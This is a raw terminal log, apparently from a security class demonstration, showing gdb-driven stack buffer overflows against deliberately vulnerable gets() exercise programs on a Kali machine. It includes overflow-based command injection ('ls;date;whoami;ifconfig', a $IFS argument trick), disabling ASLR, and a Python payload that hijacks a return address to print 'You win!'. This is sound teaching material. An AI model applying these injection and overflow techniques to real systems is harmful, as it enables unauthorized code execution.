Last login: Sat Aug 25 12:39:23 on ttys003
You have new mail.
Sams-MacBook-Pro-3:~ sambowne$ ssh root@147.144.211.246
ssh: connect to host 147.144.211.246 port 22: Connection refused
Sams-MacBook-Pro-3:~ sambowne$ ssh root@147.144.211.246
The authenticity of host '147.144.211.246 (147.144.211.246)' can't be established.
ECDSA key fingerprint is SHA256:j86yVuf/7BQJftNakbQDU7ugWN5Gq1jSgzzh1DUwGIU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '147.144.211.246' (ECDSA) to the list of known hosts.
root@147.144.211.246's password:

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Aug 25 08:26:52 2018 from 172.16.1.1
root@kali:~# cd 127
root@kali:~/127# cd ch2
root@kali:~/127/ch2# ls
buf    ch2a    ch2b    ch2c    ch2d    ch2e    exploit-pwd  p4-server.c  pwd.c
buf.c  ch2a.c  ch2b.c  ch2c.c  ch2d.c  ch2e.c  p4-server    pwd
root@kali:~/127/ch2# gdb ch2e
GNU gdb (Debian 7.12-6+b1) 7.12.0.20161007-git
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see: .
Find the GDB manual and other documentation resources online at: .
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ch2e...done.
(gdb) list 1,12
1       #include
2
3       void user_input(void)
4       {
5           char buf[30];
6           gets(buf);
7           printf("%s\n", buf);
8       }
9
10      int main()
11      {
12          user_input();
(gdb) b 7
Breakpoint 1 at 0x80488ba: file ch2e.c, line 7.
(gdb) run
Starting program: /root/127/ch2/ch2e
HELLO

Breakpoint 1, user_input () at ch2e.c:7
7           printf("%s\n", buf);
(gdb) i r
eax            0xbffff5e2   -1073744414
ecx            0x80d9340    135107392
edx            0x80da87c    135112828
ebx            0x80d9000    135106560
esp            0xbffff5e0   0xbffff5e0
ebp            0xbffff608   0xbffff608
esi            0x80d9000    135106560
edi            0x80481a8    134513064
eip            0x80488ba    0x80488ba
eflags         0x282        [ SF IF ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x0          0
gs             0x33         51
(gdb) x/30x $esp
0xbffff5e0:     0x45480001      0x004f4c4c      0xbffff6ec      0x08049638
0xbffff5f0:     0x00000001      0xbffff6e4      0xbffff6ec      0x08049609
0xbffff600:     0x00000001      0x0804ef5b      0xbffff618      0x080488e2
0xbffff610:     0x08049650      0xbffff630      0x00000000      0x08048f0f
0xbffff620:     0x0806ebbf      0x080d9000      0x080d9000      0x08048f0f
0xbffff630:     0x00000001      0xbffff6e4      0xbffff6ec      0xbffff684
0xbffff640:     0x00000000      0x00000000      0x00000000      0x080d9000
0xbffff650:     0x00000000      0x00000000
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/127/ch2/ch2e
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, user_input () at ch2e.c:7
7           printf("%s\n", buf);
(gdb) i r
eax            0xbffff5e2   -1073744414
ecx            0x80d9340    135107392
edx            0x80da87c    135112828
ebx            0x80d9000    135106560
esp            0xbffff5e0   0xbffff5e0
ebp            0xbffff608   0xbffff608
esi            0x80d9000    135106560
edi            0x80481a8    134513064
eip            0x80488ba    0x80488ba
eflags         0x282        [ SF IF ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x0          0
gs             0x33         51
(gdb) x/30x $esp
0xbffff5e0:     0x41410001      0x41414141      0x41414141      0x41414141
0xbffff5f0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff600:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff610:     0x41414141      0xbffff600      0x00000000      0x08048f0f
0xbffff620:     0x0806ebbf      0x080d9000      0x080d9000      0x08048f0f
0xbffff630:     0x00000001      0xbffff6e4      0xbffff6ec      0xbffff684
0xbffff640:     0x00000000      0x00000000      0x00000000      0x080d9000
0xbffff650:     0x00000000      0x00000000
(gdb) q
A debugging session is active.

        Inferior 1 [process 7721] will be killed.

Quit anyway? (y or n) y
root@kali:~/127/ch2# nano buf.c
root@kali:~/127/ch2# ./buf
What is your name?
SAM
Name buffer address: bf9f4f50
Command buffer address: bf9f4f78
Goodbye, SAM!
Executing command: uname -a
Linux kali 4.14.0-kali3-686-pae #1 SMP Debian 4.14.13-1kali1 (2018-01-25) i686 GNU/Linux
root@kali:~/127/ch2# ./buf
What is your name?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Name buffer address: bffc3ce0
Command buffer address: bffc3d08
Goodbye, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
Executing command: AAAAAAAAAA
sh: 1: AAAAAAAAAA: not found
root@kali:~/127/ch2# ./buf
What is your name?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls
Name buffer address: bfd43310
Command buffer address: bfd43338
Goodbye, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls!
Executing command: ls
buf    ch2a    ch2b    ch2c    ch2d    ch2e    exploit-pwd  p4-server.c  pwd.c
buf.c  ch2a.c  ch2b.c  ch2c.c  ch2d.c  ch2e.c  p4-server    pwd
root@kali:~/127/ch2# nano buf.c
root@kali:~/127/ch2# ./buf
What is your name?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls;date;whoami;ifconfig
Name buffer address: bf825820
Command buffer address: bf825848
Goodbye, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls;date;whoami;ifconfig!
Executing command: ls;date;whoami;ifconfig
buf    ch2a    ch2b    ch2c    ch2d    ch2e    exploit-pwd  p4-server.c  pwd.c
buf.c  ch2a.c  ch2b.c  ch2c.c  ch2d.c  ch2e.c  p4-server    pwd
Sat Aug 25 17:31:15 EDT 2018
root
eth0: flags=4163 mtu 1500
        inet 147.144.211.246 netmask 255.255.240.0 broadcast 147.144.223.255
        ether 00:0c:29:d8:7a:0f txqueuelen 1000 (Ethernet)
        RX packets 28758 bytes 2120546 (2.0 MiB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 484 bytes 83922 (81.9 KiB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
        device interrupt 19 base 0x2000

lo: flags=73 mtu 65536
        inet 127.0.0.1 netmask 255.0.0.0
        inet6 ::1 prefixlen 128 scopeid 0x10
        loop txqueuelen 1000 (Local Loopback)
        RX packets 48 bytes 3308 (3.2 KiB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 48 bytes 3308 (3.2 KiB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

root@kali:~/127/ch2# ./buf
What is your name?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls
Name buffer address: bf864420
Command buffer address: bf864448
Goodbye, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls!
Executing command: ls
buf    ch2a    ch2b    ch2c    ch2d    ch2e    exploit-pwd  p4-server.c  pwd.c
buf.c  ch2a.c  ch2b.c  ch2c.c  ch2d.c  ch2e.c  p4-server    pwd
root@kali:~/127/ch2# ./buf
What is your name?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls -l
Name buffer address: bffae5a0
Command buffer address: bffae5c8
Goodbye, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls!
Executing command: ls
buf    ch2a    ch2b    ch2c    ch2d    ch2e    exploit-pwd  p4-server.c  pwd.c
buf.c  ch2a.c  ch2b.c  ch2c.c  ch2d.c  ch2e.c  p4-server    pwd
root@kali:~/127/ch2# ./buf
What is your name?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls\ -l
Name buffer address: bf93b020
Command buffer address: bf93b048
Goodbye, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls\!
Executing command: ls\
sh: 1: ls\: not found
root@kali:~/127/ch2# ./buf
What is your name?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls$IFS-l
Name buffer address: bfb04ec0
Command buffer address: bfb04ee8
Goodbye, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAls$IFS-l!
Executing command: ls$IFS-l
total 3948
-rwxr-xr-x 1 root root  10068 Aug 25 14:46 buf
-rw-r--r-- 1 root root    542 Aug 25 14:46 buf.c
-rwxr-xr-x 1 root root 659892 Aug 25 09:03 ch2a
-rw-r--r-- 1 root root    110 Aug 25 09:03 ch2a.c
-rwxr-xr-x 1 root root 659820 Aug 25 09:29 ch2b
-rw-r--r-- 1 root root     76 Aug 25 16:38 ch2b.c
-rwxr-xr-x 1 root root 659940 Aug 25 09:33 ch2c
-rw-r--r-- 1 root root    146 Aug 25 09:33 ch2c.c
-rwxr-xr-x 1 root root 659972 Aug 25 10:22 ch2d
-rw-r--r-- 1 root root    156 Aug 25 10:22 ch2d.c
-rwxr-xr-x 1 root root 660020 Aug 25 10:58 ch2e
-rw-r--r-- 1 root root    139 Aug 25 10:58 ch2e.c
-rwxr-xr-x 1 root root    112 Aug 25 14:57 exploit-pwd
-rwxr-xr-x 1 root root   9108 Aug 25 14:58 p4-server
-rw-r--r-- 1 root root   1872 Aug 25 14:58 p4-server.c
-rwxr-xr-x 1 root root 660140 Aug 25 14:54 pwd
-rw-r--r-- 1 root root    343 Aug 25 14:54 pwd.c
root@kali:~/127/ch2# echo 0 > /proc/sys/kernel/randomize_va_space
root@kali:~/127/ch2# nanpo pwd.c
-bash: nanpo: command not found
root@kali:~/127/ch2# nano pwd.c
root@kali:~/127/ch2# ./pwd
Enter password: a
Fail!
root@kali:~/127/ch2# ./pwd
Enter password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault
root@kali:~/127/ch2# gdb -q pwd
Reading symbols from pwd...done.
(gdb) list
2
3       int test_pw()
4       {
5           char pin[10];
6           int x=15, i;
7           printf("Enter password: ");
8           gets(pin);
9           for (i=0; i<10; i+=2) x = (x & pin[i]) | pin[i+1];
10          if (x == 48) return 0;
11          else return 1;
(gdb) b 9
Breakpoint 1 at 0x80488d1: file pwd.c, line 9.
(gdb) run
Starting program: /root/127/ch2/pwd
Enter password: AAAAAAAAAA

Breakpoint 1, test_pw () at pwd.c:9
9           for (i=0; i<10; i+=2) x = (x & pin[i]) | pin[i+1];
(gdb) i r
eax            0xbffff5ee   -1073744402
ecx            0x80d9340    135107392
edx            0x80da87c    135112828
ebx            0x80d9000    135106560
esp            0xbffff5e0   0xbffff5e0
ebp            0xbffff608   0xbffff608
esi            0x80d9000    135106560
edi            0x80481a8    134513064
eip            0x80488d1    0x80488d1
eflags         0x282        [ SF IF ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x0          0
gs             0x33         51
(gdb) x/30x $esp
0xbffff5e0:     0x00000001      0xbffff6e4      0xbffff6ec      0x414196b8
0xbffff5f0:     0x41414141      0x41414141      0xbffff600      0x0000000f
0xbffff600:     0x00000001      0x0804efdb      0xbffff618      0x08048934
0xbffff610:     0x080496d0      0xbffff630      0x00000000      0x08048f8f
0xbffff620:     0x0806ec6f      0x080d9000      0x080d9000      0x08048f8f
0xbffff630:     0x00000001      0xbffff6e4      0xbffff6ec      0xbffff684
0xbffff640:     0x00000000      0x00000000      0x00000000      0x080d9000
0xbffff650:     0x00000000      0x00000000
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/127/ch2/pwd
Enter password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, test_pw () at pwd.c:9
9           for (i=0; i<10; i+=2) x = (x & pin[i]) | pin[i+1];
(gdb) i r
eax            0xbffff5ee   -1073744402
ecx            0x80d9340    135107392
edx            0x80da87c    135112828
ebx            0x80d9000    135106560
esp            0xbffff5e0   0xbffff5e0
ebp            0xbffff608   0xbffff608
esi            0x80d9000    135106560
edi            0x80481a8    134513064
eip            0x80488d1    0x80488d1
eflags         0x282        [ SF IF ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x0          0
gs             0x33         51
(gdb) x/30x $esp
0xbffff5e0:     0x00000001      0xbffff6e4      0xbffff6ec      0x414196b8
0xbffff5f0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff600:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff610:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff620:     0x0806ec00      0x080d9000      0x080d9000      0x08048f8f
0xbffff630:     0x00000001      0xbffff6e4      0xbffff6ec      0xbffff684
0xbffff640:     0x00000000      0x00000000      0x00000000      0x080d9000
0xbffff650:     0x00000000      0x00000000
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/127/ch2/pwd
Enter password: AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTT

Breakpoint 1, test_pw () at pwd.c:9
9           for (i=0; i<10; i+=2) x = (x & pin[i]) | pin[i+1];
(gdb) x/30x $esp
0xbffff5e0:     0x00000001      0xbffff6e4      0xbffff6ec      0x414196b8
0xbffff5f0:     0x43434242      0x45454444      0x47474646      0x49494848
0xbffff600:     0x4b4b4a4a      0x4d4d4c4c      0x4f4f4e4e      0x51515050
0xbffff610:     0x53535252      0xbf005454      0x00000000      0x08048f8f
0xbffff620:     0x0806ec6f      0x080d9000      0x080d9000      0x08048f8f
0xbffff630:     0x00000001      0xbffff6e4      0xbffff6ec      0xbffff684
0xbffff640:     0x00000000      0x00000000      0x00000000      0x080d9000
0xbffff650:     0x00000000      0x00000000
(gdb) q
A debugging session is active.

        Inferior 1 [process 8153] will be killed.

Quit anyway? (y or n) y
root@kali:~/127/ch2# nano expldemo
root@kali:~/127/ch2# gdb -q pwd
Reading symbols from pwd...done.
(gdb) list 1,20
1       #include
2
3       int test_pw()
4       {
5           char pin[10];
6           int x=15, i;
7           printf("Enter password: ");
8           gets(pin);
9           for (i=0; i<10; i+=2) x = (x & pin[i]) | pin[i+1];
10          if (x == 48) return 0;
11          else return 1;
12      }
13
14      void main()
15      {
16          if (test_pw()) printf("Fail!\n");
17          else printf("You win!\n");
18      }
(gdb) disassemble main
Dump of assembler code for function main:
   0x0804891e <+0>:     lea    0x4(%esp),%ecx
   0x08048922 <+4>:     and    $0xfffffff0,%esp
   0x08048925 <+7>:     pushl  -0x4(%ecx)
   0x08048928 <+10>:    push   %ebp
   0x08048929 <+11>:    mov    %esp,%ebp
   0x0804892b <+13>:    push   %ecx
   0x0804892c <+14>:    sub    $0x4,%esp
   0x0804892f <+17>:    call   0x80488a5
   0x08048934 <+22>:    test   %eax,%eax
   0x08048936 <+24>:    je     0x804894a
   0x08048938 <+26>:    sub    $0xc,%esp
   0x0804893b <+29>:    push   $0x80aba59
   0x08048940 <+34>:    call   0x8050290
   0x08048945 <+39>:    add    $0x10,%esp
   0x08048948 <+42>:    jmp    0x804895a
   0x0804894a <+44>:    sub    $0xc,%esp
   0x0804894d <+47>:    push   $0x80aba5f
   0x08048952 <+52>:    call   0x8050290
   0x08048957 <+57>:    add    $0x10,%esp
   0x0804895a <+60>:    nop
   0x0804895b <+61>:    mov    -0x4(%ebp),%ecx
   0x0804895e <+64>:    leave
---Type to continue, or q to quit---q
Quit
(gdb) q
root@kali:~/127/ch2# nano expldemo
root@kali:~/127/ch2# python expldemo
AABBCCDDEEFFGGHHIIJJKKLLMMNNO?M
root@kali:~/127/ch2# python expldemo | ./pwd
Segmentation fault
root@kali:~/127/ch2# python expldemo > att1
root@kali:~/127/ch2# ./pwd < att1
Segmentation fault
root@kali:~/127/ch2# gdb pwd
GNU gdb (Debian 7.12-6+b1) 7.12.0.20161007-git
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see: .
Find the GDB manual and other documentation resources online at: .
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from pwd...done.
(gdb) list 1,20
1       #include
2
3       int test_pw()
4       {
5           char pin[10];
6           int x=15, i;
7           printf("Enter password: ");
8           gets(pin);
9           for (i=0; i<10; i+=2) x = (x & pin[i]) | pin[i+1];
10          if (x == 48) return 0;
11          else return 1;
12      }
13
14      void main()
15      {
16          if (test_pw()) printf("Fail!\n");
17          else printf("You win!\n");
18      }
(gdb) break 9
Breakpoint 1 at 0x80488d1: file pwd.c, line 9.
(gdb) run < att1
Starting program: /root/127/ch2/pwd < att1

Breakpoint 1, test_pw () at pwd.c:9
9           for (i=0; i<10; i+=2) x = (x & pin[i]) | pin[i+1];
(gdb) info registers
eax            0xbffff5ee   -1073744402
ecx            0x80d9340    135107392
edx            0x80da87c    135112828
ebx            0x80d9000    135106560
esp            0xbffff5e0   0xbffff5e0
ebp            0xbffff608   0xbffff608
esi            0x80d9000    135106560
edi            0x80481a8    134513064
eip            0x80488d1    0x80488d1
eflags         0x282        [ SF IF ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x0          0
gs             0x33         51
(gdb) x/30x $esp
0xbffff5e0:     0x00000001      0xbffff6e4      0xbffff6ec      0x414196b8
0xbffff5f0:     0x43434242      0x45454444      0x47474646      0x49494848
0xbffff600:     0x4b4b4a4a      0x4d4d4c4c      0x4f4f4e4e      0x4d890408
0xbffff610:     0x08049600      0xbffff630      0x00000000      0x08048f8f
0xbffff620:     0x0806ec6f      0x080d9000      0x080d9000      0x08048f8f
0xbffff630:     0x00000001      0xbffff6e4      0xbffff6ec      0xbffff684
0xbffff640:     0x00000000      0x00000000      0x00000000      0x080d9000
0xbffff650:     0x00000000      0x00000000
(gdb)
0xbffff658:     0x00000000      0x00000006      0x00000046      0x00000040
0xbffff668:     0x00000001      0x00000000      0x00000000      0x00000000
0xbffff678:     0x00000000      0x00000000      0x00000000      0x080d9000
0xbffff688:     0x080d9000      0x080481a8      0x00000000      0x7eaabeaf
0xbffff698:     0x885857c0      0x00000000      0x00000000      0x00000000
0xbffff6a8:     0x00000000      0x00000000      0x080d9000      0x00000001
0xbffff6b8:     0x00000000      0x08048762      0x0804891e      0x00000001
0xbffff6c8:     0xbffff6e4      0x08049630
(gdb) q
A debugging session is active.

        Inferior 1 [process 8251] will be killed.

Quit anyway? (y or n) y
root@kali:~/127/ch2# ls
att1   ch2a    ch2b.c  ch2d    ch2e.c       p4-server    pwd.c
buf    ch2a.c  ch2c    ch2d.c  expldemo     p4-server.c
buf.c  ch2b    ch2c.c  ch2e    exploit-pwd  pwd
root@kali:~/127/ch2# nano expldemo
root@kali:~/127/ch2# python expldemo | ./pwd
Enter password: You win!
Segmentation fault
root@kali:~/127/ch2# gdb ch2e
GNU gdb (Debian 7.12-6+b1) 7.12.0.20161007-git
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see: .
Find the GDB manual and other documentation resources online at: .
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ch2e...done.
(gdb) list
1       #include
2
3       void user_input(void)
4       {
5           char buf[30];
6           gets(buf);
7           printf("%s\n", buf);
8       }
9
10      int main()
(gdb) break 7
Breakpoint 1 at 0x80488ba: file ch2e.c, line 7.
(gdb) run
Starting program: /root/127/ch2/ch2e
AAAAA

Breakpoint 1, user_input () at ch2e.c:7
7           printf("%s\n", buf);
(gdb) info registers
eax            0xbffff5e2   -1073744414
ecx            0x80d9340    135107392
edx            0x80da87c    135112828
ebx            0x80d9000    135106560
esp            0xbffff5e0   0xbffff5e0
ebp            0xbffff608   0xbffff608
esi            0x80d9000    135106560
edi            0x80481a8    134513064
eip            0x80488ba    0x80488ba
eflags         0x282        [ SF IF ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x0          0
gs             0x33         51
(gdb) x/20x $esp
0xbffff5e0:     0x41410001      0x00414141      0xbffff6ec      0x08049638
0xbffff5f0:     0x00000001      0xbffff6e4      0xbffff6ec      0x08049609
0xbffff600:     0x00000001      0x0804ef5b      0xbffff618      0x080488e2
0xbffff610:     0x08049650      0xbffff630      0x00000000      0x08048f0f
0xbffff620:     0x0806ebbf      0x080d9000      0x080d9000      0x08048f0f
(gdb) x/20c $esp
0xbffff5e0:     1 '\001'  0 '\000'  65 'A'  65 'A'  65 'A'  65 'A'  65 'A'  0 '\000'
0xbffff5e8:     -20 '\354'  -10 '\366'  -1 '\377'  -65 '\277'  56 '8'  -106 '\226'  4 '\004'  8 '\b'
0xbffff5f0:     1 '\001'  0 '\000'  0 '\000'  0 '\000'
(gdb) help
List of classes of commands:

aliases -- Aliases of other commands
breakpoints -- Making program stop at certain points
data -- Examining data
files -- Specifying and examining files
internals -- Maintenance commands
obscure -- Obscure features
running -- Running the program
stack -- Examining the stack
status -- Status inquiries
support -- Support facilities
tracepoints -- Tracing of program execution without stopping the program
user-defined -- User-defined commands

Type "help" followed by a class name for a list of commands in that class.
Type "help all" for the list of all commands.
Type "help" followed by command name for full documentation.
Type "apropos word" to search for commands related to "word".
Command name abbreviations are allowed if unambiguous.
(gdb) help x
Examine memory: x/FMT ADDRESS.
ADDRESS is an expression for the memory address to examine.
FMT is a repeat count followed by a format letter and a size letter.
Format letters are o(octal), x(hex), d(decimal), u(unsigned decimal),
  t(binary), f(float), a(address), i(instruction), c(char), s(string)
  and z(hex, zero padded on the left).
Size letters are b(byte), h(halfword), w(word), g(giant, 8 bytes).
The specified number of objects of the specified size are printed
according to the format.  If a negative number is specified, memory is
examined backward from the address.

Defaults for format and size letters are those previously used.
Default count is 1.  Default address is following last thing printed
with this command or "print".
(gdb)